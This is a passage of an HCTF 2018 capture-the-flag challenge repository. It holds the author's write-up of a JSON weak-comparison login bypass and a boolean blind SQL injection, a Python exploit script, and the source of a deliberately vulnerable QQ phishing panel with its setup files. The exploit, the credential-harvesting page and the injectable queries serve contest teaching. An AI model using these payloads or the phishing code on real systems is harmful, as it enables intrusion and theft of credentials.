 79 | 
 80 | ```php
 81 | $session = json_decode(authcode($_GPC['__session']), true);
 82 | if (is_array($session)) {
 83 | 	$user = user_single(array('uid'=>$session['uid']));
 84 | 	if (is_array($user) && $session['hash'] == md5($user['password'] . $user['salt'])) {
 85 | 		$_W['uid'] = $user['uid'];
 86 | 		$_W['username'] = $user['username'];
 87 | 		$user['currentvisit'] = $user['lastvisit'];
 88 | 		$user['currentip'] = $user['lastip'];
 89 | 		$user['lastvisit'] = $session['lastvisit'];
 90 | 		$user['lastip'] = $session['lastip'];
 91 | 		$_W['user'] = $user;
 92 | 		$_W['isfounder'] = user_is_founder($_W['uid']);
 93 | 		unset($founders);
 94 | 	} else {
 95 | 		isetcookie('__session', false, -100);
 96 | 	}
 97 | 	unset($user);
 98 | }
 99 | unset($session);
100 | 
101 | ```
102 | 
103 | 简单来说，就是`微擎` 将用于验证用户身份的`hash` 值，使用了 `json_encode` 进行序列化并储存在 cookie 里面。而在验证的时候，再用`json_decode` 反序列化后取出。但是需要注意的是，在将`hash` 值与数据库中存储的用户密码的`md5` 值进行比较的时候，使用的是弱比较，这就导致我们可以通过构造 `json`字符串使`hash`值为数字，利用弱类型，绕过用户身份验证，实现任意用户登录。
104 | 
105 | 我在这里套用了这个漏洞：
106 | 
107 | ```php
108 | $login_data = json_decode($_COOKIE['login_data'], true);
109 | $admin_user = $login_data['admin_user'];
110 | $udata = $DB->get_row("SELECT * FROM fish_admin WHERE username='$admin_user' limit 1");
111 | if ($udata['username'] == '') {
112 | 	setcookie("islogin", "", time() - 604800);
113 | 	setcookie("login_data", "", time() - 604800);
114 | }
115 | $admin_pass = sha1($udata['password'] . LOGIN_KEY);
116 | if ($admin_pass == $login_data['admin_pass']) {
117 |      $islogin = 1;
118 | } else {
119 |    	setcookie("islogin", "", time() - 604800);
120 |     setcookie("login_data", "", time() - 604800);
121 | }
122 | ```
123 | 
124 | 本来的思路是让大家进行爆破，登录`admin`账户,然后通过 `$admin_user` 构造条件语句，这样就可以通过登录状态来进行布尔盲注了。
125 | 
126 | 然而没想到的两点是：
127 | 
128 | 1. 这恰恰引入了利用 `json` 反序列化 Unicode 绕过 WAF 的漏洞
129 | 
130 | 2. 利用平台本身的逻辑问题，就可以实现布尔注入，具体位置就在上面的代码中：
131 | 
132 |    * 当查询返回的用户名为空且密码错误时，进行四次`setcookie` 操作
133 |    * 当查询返回的用户名为不为空时，进行两次`setcookie` 操作
134 | 
135 |    利用这个差异，就已经可以实现布尔盲注了。
136 | 
137 | 所以，这道题目对于我这个出题人来说，其实算是一个比较失败的产物，好在题目本身还能够让一些选手收获知识/乐趣，而且还是有一些队伍是按照我的预期思路做出的这道题目的。而经历48小时的蹂躏后，题目共有 33 只队伍提交有效答案，最终分值为 361分， 也符合我的预期。
138 | 
139 | 未来的一年，我会努力学习更多姿势、积累出题经验，争取在明年的 HCTF 上，给大家带来更优质的题目。
140 | 
141 | 最后，附上我的预期解`exp `:
142 | 
143 | > PS：由于我上传源码的时候，随手更改了`flag` 导致了一些小变化，下面这个`exp` 就不能直接跑出`flag` 的内容了，大家可以想一想该怎么操作2333
144 | 
145 | ```python
146 | """
147 | 	Author:Li4n0
148 | 	Time:2018.11.7
149 | """
150 | 
151 | import requests
152 | 
153 | url = 'http://kzone.2018.hctf.io/admin/'
154 | key = ''
155 | strings = [chr(i) for i in range(32, 127)]
156 | 
157 | while True:
158 |     for i in reversed(strings):
159 |         if 'or' in key + i:
160 |             continue
161 |        #payload = "admin' and (select group_concat(table_name) from mysql.innodb_table_stats) between '%s' and '%s' and '1" % (key + i, chr(126))
162 |         payload = "admin' and (select * from F1444g) between '%s' and '%s' and '1" % (key + i, chr(126))
163 |        
164 |         headers = {
165 |             'cookie': 'islogin=1;login_data={"admin_user":"%s","admin_pass":65}' %
166 |                       payload.replace(' ', '/**/').replace("\"", '\\"'),
167 |         }
168 |         #print(headers)
169 |         r = requests.get(url, headers=headers)
170 |         #print(r.text)
171 |         if 'Management Index' in r.text:
172 |             key += i
173 |             break
174 |         else:
175 |             print(i)
176 |     print(key)
177 | 
178 | ```
179 | 
180 | 
181 | 
182 | 
183 | 
184 | 
185 | 
186 | 
187 | 
188 | 
189 | 
190 | 
191 | 


--------------------------------------------------------------------------------
/HCTF2018_kzone/apache2.conf:
--------------------------------------------------------------------------------
  1 | # This is the main Apache server configuration file.  It contains the
  2 | # configuration directives that give the server its instructions.
  3 | # See http://httpd.apache.org/docs/2.4/ for detailed information about
  4 | # the directives and /usr/share/doc/apache2/README.Debian about Debian specific
  5 | # hints.
  6 | #
  7 | #
  8 | # Summary of how the Apache 2 configuration works in Debian:
  9 | # The Apache 2 web server configuration in Debian is quite different to
 10 | # upstream's suggested way to configure the web server. This is because Debian's
 11 | # default Apache2 installation attempts to make adding and removing modules,
 12 | # virtual hosts, and extra configuration directives as flexible as possible, in
 13 | # order to make automating the changes and administering the server as easy as
 14 | # possible.
 15 | 
 16 | # It is split into several files forming the configuration hierarchy outlined
 17 | # below, all located in the /etc/apache2/ directory:
 18 | #
 19 | #	/etc/apache2/
 20 | #	|-- apache2.conf
 21 | #	|	`--  ports.conf
 22 | #	|-- mods-enabled
 23 | #	|	|-- *.load
 24 | #	|	`-- *.conf
 25 | #	|-- conf-enabled
 26 | #	|	`-- *.conf
 27 | # 	`-- sites-enabled
 28 | #	 	`-- *.conf
 29 | #
 30 | #
 31 | # * apache2.conf is the main configuration file (this file). It puts the pieces
 32 | #   together by including all remaining configuration files when starting up the
 33 | #   web server.
 34 | #
 35 | # * ports.conf is always included from the main configuration file. It is
 36 | #   supposed to determine listening ports for incoming connections which can be
 37 | #   customized anytime.
 38 | #
 39 | # * Configuration files in the mods-enabled/, conf-enabled/ and sites-enabled/
 40 | #   directories contain particular configuration snippets which manage modules,
 41 | #   global configuration fragments, or virtual host configurations,
 42 | #   respectively.
 43 | #
 44 | #   They are activated by symlinking available configuration files from their
 45 | #   respective *-available/ counterparts. These should be managed by using our
 46 | #   helpers a2enmod/a2dismod, a2ensite/a2dissite and a2enconf/a2disconf. See
 47 | #   their respective man pages for detailed information.
 48 | #
 49 | # * The binary is called apache2. Due to the use of environment variables, in
 50 | #   the default configuration, apache2 needs to be started/stopped with
 51 | #   /etc/init.d/apache2 or apache2ctl. Calling /usr/bin/apache2 directly will not
 52 | #   work with the default configuration.
 53 | 
 54 | 
 55 | # Global configuration
 56 | #
 57 | 
 58 | #
 59 | # ServerRoot: The top of the directory tree under which the server's
 60 | # configuration, error, and log files are kept.
 61 | #
 62 | # NOTE!  If you intend to place this on an NFS (or otherwise network)
 63 | # mounted filesystem then please read the Mutex documentation (available
 64 | # at <URL:http://httpd.apache.org/docs/2.4/mod/core.html#mutex>);
 65 | # you will save yourself a lot of trouble.
 66 | #
 67 | # Do NOT add a slash at the end of the directory path.
 68 | #
 69 | #ServerRoot "/etc/apache2"
 70 | 
 71 | #
 72 | # The accept serialization lock file MUST BE STORED ON A LOCAL DISK.
 73 | #
 74 | Mutex file:${APACHE_LOCK_DIR} default
 75 | 
 76 | #
 77 | # PidFile: The file in which the server should record its process
 78 | # identification number when it starts.
 79 | # This needs to be set in /etc/apache2/envvars
 80 | #
 81 | PidFile ${APACHE_PID_FILE}
 82 | 
 83 | #
 84 | # Timeout: The number of seconds before receives and sends time out.
 85 | #
 86 | Timeout 300
 87 | 
 88 | #
 89 | # KeepAlive: Whether or not to allow persistent connections (more than
 90 | # one request per connection). Set to "Off" to deactivate.
 91 | #
 92 | KeepAlive On
 93 | 
 94 | #
 95 | # MaxKeepAliveRequests: The maximum number of requests to allow
 96 | # during a persistent connection. Set to 0 to allow an unlimited amount.
 97 | # We recommend you leave this number high, for maximum performance.
 98 | #
 99 | MaxKeepAliveRequests 100
100 | 
101 | #
102 | # KeepAliveTimeout: Number of seconds to wait for the next request from the
103 | # same client on the same connection.
104 | #
105 | KeepAliveTimeout 5
106 | 
107 | 
108 | # These need to be set in /etc/apache2/envvars
109 | User ${APACHE_RUN_USER}
110 | Group ${APACHE_RUN_GROUP}
111 | 
112 | #
113 | # HostnameLookups: Log the names of clients or just their IP addresses
114 | # e.g., www.apache.org (on) or 204.62.129.132 (off).
115 | # The default is off because it'd be overall better for the net if people
116 | # had to knowingly turn this feature on, since enabling it means that
117 | # each client request will result in AT LEAST one lookup request to the
118 | # nameserver.
119 | #
120 | HostnameLookups Off
121 | 
122 | # ErrorLog: The location of the error log file.
123 | # If you do not specify an ErrorLog directive within a <VirtualHost>
124 | # container, error messages relating to that virtual host will be
125 | # logged here.  If you *do* define an error logfile for a <VirtualHost>
126 | # container, that host's errors will be logged there and not here.
127 | #
128 | ErrorLog ${APACHE_LOG_DIR}/error.log
129 | 
130 | #
131 | # LogLevel: Control the severity of messages logged to the error_log.
132 | # Available values: trace8, ..., trace1, debug, info, notice, warn,
133 | # error, crit, alert, emerg.
134 | # It is also possible to configure the log level for particular modules, e.g.
135 | # "LogLevel info ssl:warn"
136 | #
137 | LogLevel warn
138 | 
139 | # Include module configuration:
140 | IncludeOptional mods-enabled/*.load
141 | IncludeOptional mods-enabled/*.conf
142 | 
143 | # Include list of ports to listen on
144 | Include ports.conf
145 | 
146 | 
147 | # Sets the default security model of the Apache2 HTTPD server. It does
148 | # not allow access to the root filesystem outside of /usr/share and /var/www.
149 | # The former is used by web applications packaged in Debian,
150 | # the latter may be used for local directories served by the web server. If
151 | # your system is serving content from a sub-directory in /srv you must allow
152 | # access here, or in any related virtual host.
153 | <Directory />
154 | 	Options FollowSymLinks
155 | 	AllowOverride None
156 | 	Require all denied
157 | </Directory>
158 | 
159 | <Directory /usr/share>
160 | 	AllowOverride None
161 | 	Require all granted
162 | </Directory>
163 | 
164 | <Directory /var/www/>
165 | 	Options Indexes FollowSymLinks
166 | 	AllowOverride None
167 | 	Require all granted
168 | </Directory>
169 | 
170 | #<Directory /srv/>
171 | #	Options Indexes FollowSymLinks
172 | #	AllowOverride None
173 | #	Require all granted
174 | #</Directory>
175 | 
176 | 
177 | 
178 | 
179 | # AccessFileName: The name of the file to look for in each directory
180 | # for additional configuration directives.  See also the AllowOverride
181 | # directive.
182 | #
183 | AccessFileName .htaccess
184 | 
185 | #
186 | # The following lines prevent .htaccess and .htpasswd files from being
187 | # viewed by Web clients.
188 | #
189 | <FilesMatch "^\.ht">
190 | 	Require all denied
191 | </FilesMatch>
192 | 
193 | 
194 | #
195 | # The following directives define some format nicknames for use with
196 | # a CustomLog directive.
197 | #
198 | # These deviate from the Common Log Format definitions in that they use %O
199 | # (the actual bytes sent including headers) instead of %b (the size of the
200 | # requested file), because the latter makes it impossible to detect partial
201 | # requests.
202 | #
203 | # Note that the use of %{X-Forwarded-For}i instead of %h is not recommended.
204 | # Use mod_remoteip instead.
205 | #
206 | RemoteIPHeader X-Forwarded-For
207 | RemoteIPInternalProxy 119.28.136.88
208 | 
209 | LogFormat "%v:%p %a %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined
210 | #LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined
211 | LogFormat "%a %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
212 | LogFormat "%a %l %u %t \"%r\" %>s %O" common
213 | LogFormat "%{Referer}i -> %U" referer
214 | LogFormat "%{User-agent}i" agent
215 | 
216 | # Include of directories ignores editors' and dpkg's backup files,
217 | # see README.Debian for details.
218 | 
219 | # Include generic snippets of statements
220 | IncludeOptional conf-enabled/*.conf
221 | 
222 | # Include the virtual host configurations:
223 | IncludeOptional sites-enabled/*.conf
224 | 
225 | # vim: syntax=apache ts=4 sw=4 sts=4 sr noet
226 | ServerName localhost
227 | 


--------------------------------------------------------------------------------
/HCTF2018_kzone/docker-compose.yml:
--------------------------------------------------------------------------------
 1 | version: '2'
 2 | services:
 3 |  web:
 4 |    image: "li4n0/hctf_kouzone"
 5 |    container_name: "hctf_kouzone"
 6 |    build: .
 7 |    ports:
 8 |      - "10000:80"
 9 |    volumes:
10 |      - "./web:/var/www/html"
11 |    environment:
12 |      - MYSQL_ADMIN_PASS=@hctf_k0u_z0ne
13 | 


--------------------------------------------------------------------------------
/HCTF2018_kzone/hctf.sql:
--------------------------------------------------------------------------------
  1 | -- MySQL dump 10.13  Distrib 5.7.23, for Linux (x86_64)
  2 | --
  3 | -- Host: localhost    Database: hctf_kouzone
  4 | -- ------------------------------------------------------
  5 | -- Server version	5.7.23-0ubuntu0.16.04.1-log
  6 | 
  7 | /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
  8 | /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
  9 | /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
 10 | /*!40101 SET NAMES utf8 */;
 11 | /*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
 12 | /*!40103 SET TIME_ZONE='+00:00' */;
 13 | /*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
 14 | /*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
 15 | /*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
 16 | /*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;
 17 | 
 18 | --
 19 | -- Table structure for table `F1444g`
 20 | --
 21 | 
 22 | DROP TABLE IF EXISTS `F1444g`;
 23 | /*!40101 SET @saved_cs_client     = @@character_set_client */;
 24 | /*!40101 SET character_set_client = utf8 */;
 25 | CREATE TABLE `F1444g` (
 26 |   `F1a9` varchar(50) DEFAULT NULL
 27 | ) ENGINE=InnoDB DEFAULT CHARSET=utf8;
 28 | /*!40101 SET character_set_client = @saved_cs_client */;
 29 | 
 30 | --
 31 | -- Dumping data for table `F1444g`
 32 | --
 33 | 
 34 | LOCK TABLES `F1444g` WRITE;
 35 | /*!40000 ALTER TABLE `F1444g` DISABLE KEYS */;
 36 | INSERT INTO `F1444g` VALUES ('hctf{hctf_2018_kzone_Author_Li4n0}');
 37 | /*!40000 ALTER TABLE `F1444g` ENABLE KEYS */;
 38 | UNLOCK TABLES;
 39 | 
 40 | --
 41 | -- Table structure for table `fish_admin`
 42 | --
 43 | 
 44 | DROP TABLE IF EXISTS `fish_admin`;
 45 | /*!40101 SET @saved_cs_client     = @@character_set_client */;
 46 | /*!40101 SET character_set_client = utf8 */;
 47 | CREATE TABLE `fish_admin` (
 48 |   `id` tinyint(3) unsigned NOT NULL AUTO_INCREMENT,
 49 |   `username` varchar(20) NOT NULL,
 50 |   `password` char(32) NOT NULL,
 51 |   `name` varchar(255) DEFAULT '',
 52 |   `qq` varchar(255) DEFAULT '',
 53 |   `per` int(11) NOT NULL DEFAULT '3' COMMENT '权限，1=超级管理员；2=普通管理员；3=未知权限；',
 54 |   PRIMARY KEY (`id`),
 55 |   UNIQUE KEY `username` (`username`)
 56 | ) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
 57 | /*!40101 SET character_set_client = @saved_cs_client */;
 58 | 
 59 | --
 60 | -- Dumping data for table `fish_admin`
 61 | --
 62 | 
 63 | LOCK TABLES `fish_admin` WRITE;
 64 | /*!40000 ALTER TABLE `fish_admin` DISABLE KEYS */;
 65 | INSERT INTO `fish_admin` VALUES (1,'admin','be933cba048a9727a2d2e9e08f5ed046','小杰','1503816935',1);
 66 | /*!40000 ALTER TABLE `fish_admin` ENABLE KEYS */;
 67 | UNLOCK TABLES;
 68 | 
 69 | --
 70 | -- Table structure for table `fish_ip`
 71 | --
 72 | 
 73 | DROP TABLE IF EXISTS `fish_ip`;
 74 | /*!40101 SET @saved_cs_client     = @@character_set_client */;
 75 | /*!40101 SET character_set_client = utf8 */;
 76 | CREATE TABLE `fish_ip` (
 77 |   `id` int(11) NOT NULL AUTO_INCREMENT,
 78 |   `admin` int(11) NOT NULL,
 79 |   `ip` varchar(30) DEFAULT NULL,
 80 |   `addres` varchar(30) DEFAULT NULL,
 81 |   `platform` varchar(150) DEFAULT NULL,
 82 |   `date` datetime DEFAULT NULL,
 83 |   PRIMARY KEY (`id`)
 84 | ) ENGINE=InnoDB DEFAULT CHARSET=utf8;
 85 | /*!40101 SET character_set_client = @saved_cs_client */;
 86 | 
 87 | --
 88 | -- Dumping data for table `fish_ip`
 89 | --
 90 | 
 91 | LOCK TABLES `fish_ip` WRITE;
 92 | /*!40000 ALTER TABLE `fish_ip` DISABLE KEYS */;
 93 | /*!40000 ALTER TABLE `fish_ip` ENABLE KEYS */;
 94 | UNLOCK TABLES;
 95 | 
 96 | --
 97 | -- Table structure for table `fish_user`
 98 | --
 99 | 
100 | DROP TABLE IF EXISTS `fish_user`;
101 | /*!40101 SET @saved_cs_client     = @@character_set_client */;
102 | /*!40101 SET character_set_client = utf8 */;
103 | CREATE TABLE `fish_user` (
104 |   `id` smallint(5) unsigned NOT NULL AUTO_INCREMENT,
105 |   `username` varchar(20) NOT NULL,
106 |   `password` char(32) NOT NULL,
107 |   `ip` varchar(15) DEFAULT NULL,
108 |   `address` varchar(30) DEFAULT NULL,
109 |   `time` datetime DEFAULT NULL,
110 |   `device` varchar(255) DEFAULT '',
111 |   `output` int(1) DEFAULT '0',
112 |   PRIMARY KEY (`id`),
113 |   UNIQUE KEY `username` (`username`)
114 | ) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
115 | /*!40101 SET character_set_client = @saved_cs_client */;
116 | 
117 | --
118 | -- Dumping data for table `fish_user`
119 | --
120 | 
121 | LOCK TABLES `fish_user` WRITE;
122 | /*!40000 ALTER TABLE `fish_user` DISABLE KEYS */;
123 | /*!40000 ALTER TABLE `fish_user` ENABLE KEYS */;
124 | UNLOCK TABLES;
125 | 
126 | --
127 | -- Table structure for table `fish_user_fake`
128 | --
129 | 
130 | DROP TABLE IF EXISTS `fish_user_fake`;
131 | /*!40101 SET @saved_cs_client     = @@character_set_client */;
132 | /*!40101 SET character_set_client = utf8 */;
133 | CREATE TABLE `fish_user_fake` (
134 |   `id` smallint(5) unsigned NOT NULL AUTO_INCREMENT,
135 |   `username` varchar(20) NOT NULL,
136 |   `password` char(32) NOT NULL,
137 |   `ip` varchar(15) DEFAULT NULL,
138 |   `address` varchar(30) DEFAULT NULL,
139 |   `time` datetime DEFAULT NULL,
140 |   `device` varchar(255) DEFAULT '',
141 |   `output` int(1) DEFAULT '0',
142 |   PRIMARY KEY (`id`),
143 |   UNIQUE KEY `username` (`username`)
144 | ) ENGINE=InnoDB DEFAULT CHARSET=utf8;
145 | /*!40101 SET character_set_client = @saved_cs_client */;
146 | 
147 | --
148 | -- Dumping data for table `fish_user_fake`
149 | INSERT INTO `fish_user_fake` VALUES (1,'512343234','woainishangderen','223.104.247.244','','2018-11-09 20:38:00','Huawei DUK',0),
150 | (2,'22342344','19990623','213.102.245.245','','2018-11-09 20:38:01','Huawei DUK',0),
151 | (3,'12323234','ttehedfsdf','213.102.245.245','','2018-11-09 20:38:00','Huawei DUK',0),
152 | (4,'9438327474','zjh19970406','213.102.245.245','','2018-11-09 20:05:10','Huawei DUK',0),
153 | (5,'173848483','admin8888','223.104.247.244','','2018-11-09 20:05:20','Huawei DUK',0),
154 | (6,'939303033','wojizhehhh','223.104.247.244','','2018-11-09 20:05:30','Huawei DUK',0),
155 | (7,'1090239123','2333333haixingba','223.104.247.244','','2018-11-09 20:06:00','Huawei DUK',0),
156 | (8,'84466465','zhetizazua','223.104.247.244','','2018-11-09 20:07:01','Huawei DUK',0),
157 | (9,'51234234234','@!jjsjjdn','223.100.245.242','','2018-11-09 20:08:20','Huawei DUK',0),
158 | (10,'556643223','buhuizuoaaa','33.104.247.242','','2018-11-09 20:08:23','Huawei DUK',0),
159 | (11,'34234324324','udnkaj','23.105.147.44','','2018-11-09 20:10:10','Huawei DUK',0),
160 | (12,'986884646','11111111','223.104.247.244','','2018-11-09 20:15:12','Huawei DUK',0),
161 | (13,'846469468','12345678','23.103.27.24','','2018-11-09 20:15:43','Huawei DUK',0),
162 | (14,'98898769','888888888','22.10.147.44','','2018-11-09 20:15:44','Huawei DUK',0),
163 | (15,'512123123','admin123','223.104.247.244','','2018-11-09 20:15:45','Huawei DUK',0),
164 | (16,'123143433','admin888','22.10.24.204','','2018-11-09 20:15:50','Huawei DUK',0),
165 | (17,'84843937','testtesttest','223.104.247.244','','2018-11-09 20:15:51','Huawei DUK',0),
166 | (18,'897987987','woaini','223.104.247.244','','2018-11-09 20:15:53','Huawei DUK',0),
167 | (19,'65637980','5201314ads','203.108.246.214','','2018-11-09 20:15:54','Huawei DUK',0),
168 | (20,'45453459','asdasdasd','203.105.247.201','','2018-11-09 20:15:55','Huawei DUK',0),
169 | (21,'590980980','895qazqaz','117.104.222.243','','2018-11-09 20:15:56','Huawei DUK',0),
170 | (22,'90980989','orzorzorz23333','213.114.247.243','','2018-11-09 20:16:20','Huawei DUK',0),
171 | (23,'864565468','1234asdfg','123.104.247.242','','2018-11-09 20:17:43','Huawei DUK',0);
172 | --
173 | 
174 | LOCK TABLES `fish_user_fake` WRITE;
175 | /*!40000 ALTER TABLE `fish_user_fake` DISABLE KEYS */;
176 | /*!40000 ALTER TABLE `fish_user_fake` ENABLE KEYS */;
177 | UNLOCK TABLES;
178 | /*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;
179 | 
180 | /*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
181 | /*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
182 | /*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
183 | /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
184 | /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
185 | /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
186 | /*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;
187 | 
188 | -- Dump completed on 2018-11-09  7:40:07
189 | 


--------------------------------------------------------------------------------
/HCTF2018_kzone/init.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | service mysql start;
 3 | 
 4 | mysql -uroot -e"use mysql;update user set authentication_string=password('@hctf_k0u_z0ne') where user='root';create user 'r00t'@'localhost'identified by 'Fish_k0u_z0ne'; flush privileges;"
 5 | mysql -uroot -p\@hctf_k0u_z0ne -e"create database hctf_kouzone;grant select,insert on hctf_kouzone.* to 'r00t'@'localhost';grant select on mysql.* to 'r00t'@'localhost';flush privileges;"
 6 | 
 7 | mysql -uroot -p\@hctf_k0u_z0ne hctf_kouzone < /home/hctf.sql
 8 | a2enmod remoteip
 9 | service apache2 restart
10 | 


--------------------------------------------------------------------------------
/HCTF2018_kzone/start_up.sh:
--------------------------------------------------------------------------------
1 | docker-compose build
2 | echo "running the container"
3 | docker-compose up -d
4 | sleep 6
5 | echo "init the database"
6 | docker exec -it hctf_kouzone /bin/bash /home/init.sh
7 | 
8 | echo "All finished! Please check the output message to confirm the service is running, or to rebuild"
9 | 


--------------------------------------------------------------------------------
/HCTF2018_kzone/uninstall.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | 
3 | docker stop hctf_kouzone
4 | docker rm hctf_kouzone 
5 | 


--------------------------------------------------------------------------------
/HCTF2018_kzone/web/2018.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | require_once './include/common.php';
 3 | $realip = real_ip();
 4 | $ipcount = $DB->count("SELECT count(*) from fish_user where ip='$realip'");
 5 | if ($ipcount < 3) {
 6 |     $username = addslashes($_POST['user']);
 7 |     $password = addslashes($_POST['pass']);
 8 |     $address = getCity($realip);
 9 |     $time = date("Y-m-d H:i:s");
10 |     $ua = $_SERVER['HTTP_USER_AGENT'];
11 |     $device = get_device($ua);
12 |     $sql = "INSERT INTO `fish_user`(`username`, `password`, `ip`, `address`, `time`, `device`) VALUES ('{$username}','{$password}','{$realip}','{$address}','{$time}','{$device}')";
13 |     $DB->query($sql);
14 |     header("Location: https://i.qq.com/?rd=" . $username);
15 | } else {
16 |     header("Location: https://i.qq.com/?rd=" . $username);
17 | }
18 | ?>


--------------------------------------------------------------------------------
/HCTF2018_kzone/web/Default account&password.txt:
--------------------------------------------------------------------------------
1 | admin admin


--------------------------------------------------------------------------------
/HCTF2018_kzone/web/Tutorial.txt:
--------------------------------------------------------------------------------
 1 | _____________________________________
 2 | OK, not much nonsense, the tutorial starts
 3 | ——————————
 4 | 
 5 | 
 6 | First go and prepare a host yourself
 7 | Upload the decompression source
 8 | 
 9 | Configure config.php
10 | 
11 | 
12 | OK configuration is complete
13 | 
14 | Import the database again
15 | Install.sql
16 | OK
17 | 
18 | 
19 | Now you can access the domain name to see the effect.
20 | 
21 | 
22 | This is the front desk (because I have built it before, I recorded the account password so I have this)
23 | 
24 | Background address /admin
25 | 
26 | Default account password admin/admin
27 | 
28 | Teach you how to modify the background account password
29 | Open the website https://md5jiami.51240.com/
30 | Enter the password you want
31 | 
32 | 
33 | I set it to 2838778326ym
34 | Generate, copy 32-bit lowercase md5
35 | Enter the database
36 | 
37 | 
38 | Next, take a closer loOK at my operation.
39 | 
40 | 
41 | This is the background account
42 | This is the background default MD5 encrypted password (we copy our generated MD5 into it)
43 | 
44 | OK, done
45 | 
46 | 
47 | I am modifying the login account.
48 | 
49 | The account password was set to 2838778326/2838778326ym.
50 | 
51 | If you want to modify the background login address, you can directly modify the admin directory name.
52 | OK


--------------------------------------------------------------------------------
/HCTF2018_kzone/web/admin/delete.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | require_once '../include/common.php';
 3 | if($islogin==1){}else exit("<script language='javascript'>window.location.href='./login.php';</script>");
 4 | $zhi=$_GET['id'];
 5 | $sql="delete from fish_user where id in($zhi);";
 6 | if(isset($_GET['all'])){
 7 | 	$sql="delete from fish_user where 1;";
 8 | }
 9 |   if($DB->query($sql)){
10 | 	exit("<script language='javascript'>alert('delete succeed！');window.location.href='./index.php';</script>");
11 |   }else{
12 |   	exit("<script language='javascript'>alert('delete failed！');history.go(-1);</script>");
13 |   }
14 | ?>


--------------------------------------------------------------------------------
/HCTF2018_kzone/web/admin/index.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | include("../include/common.php");
 3 | if ($islogin == 1) {
 4 | } else exit("<script language='javascript'>window.location.href='./login.php';</script>");
 5 | $r1 = $DB->count("SELECT COUNT(id) from fish_user_fake");
 6 | ?>
 7 | <!DOCTYPE html>
 8 | <html lang="zh-cn">
 9 | <head>
10 |     <meta charset="utf-8"/>
11 |     <meta name="viewport" content="width=device-width, initial-scale=1"/>
12 |     <title>KK Zone Fish Control Center</title>
13 |     <link href="//cdn.bootcss.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet"/>
14 |     <script src="//cdn.bootcss.com/jquery/1.12.4/jquery.min.js"></script>
15 |     <script src="//cdn.bootcss.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
16 |     <!--[if lt IE 9]>
17 |     <script src="//cdn.bootcss.com/html5shiv/3.7.3/html5shiv.min.js"></script>
18 |     <script src="//cdn.bootcss.com/respond.js/1.4.2/respond.min.js"></script>
19 |     <![endif]-->
20 | </head>
21 | <body>
22 | <nav class="navbar navbar-fixed-top navbar-default">
23 |     <div class="container">
24 |         <div class="navbar-header">
25 |             <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar"
26 |                     aria-expanded="false" aria-controls="navbar">
27 |                 <span class="sr-only">Navigation</span>
28 |                 <span class="icon-bar"></span>
29 |                 <span class="icon-bar"></span>
30 |                 <span class="icon-bar"></span>
31 |             </button>
32 |             <a class="navbar-brand" href="./">KK Zone Fish Control Center</a>
33 |         </div><!-- /.navbar-header -->
34 |         <div id="navbar" class="collapse navbar-collapse">
35 |             <ul class="nav navbar-nav navbar-right">
36 |                 <li class="">
37 |                     <a href="./"><span class="glyphicon glyphicon-user"></span> Index</a>
38 |                 </li>
39 |                 <li class="active">
40 |                     <a href="./list.php"><span class="glyphicon glyphicon-calendar"></span> Fish Management</a>
41 |                 </li>
42 |                 <li><a href="./login.php?logout"><span class="glyphicon glyphicon-log-out"></span> Logout</a></li>
43 |             </ul>
44 |         </div><!-- /.navbar-collapse -->
45 |     </div><!-- /.container -->
46 | </nav><!-- /.navbar -->
47 | <div class="container" style="padding-top:70px;">
48 |     <div class="col-xs-12 col-sm-10 col-lg-8 center-block" style="float: none;">
49 |         <div class="panel panel-primary">
50 |             <div class="panel-heading"><h3 class="panel-title">Management Index</h3></div>
51 |             <ul class="list-group">
52 | 
53 |                 <li class="list-group-item"><span class="glyphicon glyphicon-tint"></span> <b></b>Fish
54 |                     count:<?php echo $r1 ?>
55 | 
56 |                 </li>
57 |                 <li class="list-group-item"><span class="glyphicon glyphicon-time"></span> <b>Current
58 |                         Time：</b><?php echo date("Y-m-d h:i:sa") ?>  </li>
59 |                 <li class="list-group-item"><span class="glyphicon glyphicon-home"></span> <a href="./list.php"
60 |                                                                                               class="btn btn-xs btn-warning">Fish
61 |                         Management</a>
62 |                 </li>
63 |             </ul>
64 |         </div>
65 |         <div class="panel panel-info">
66 |             <div class="panel-heading">
67 |                 <h3 class="panel-title">Server Information</h3>
68 |             </div>
69 |             <ul class="list-group">
70 |                 <li class="list-group-item">
71 |                     <b>PHP Version：</b><?php echo phpversion() ?>
72 |                     <?php if (ini_get('safe_mode')) {
73 |                         echo 'Thread safe';
74 |                     } else {
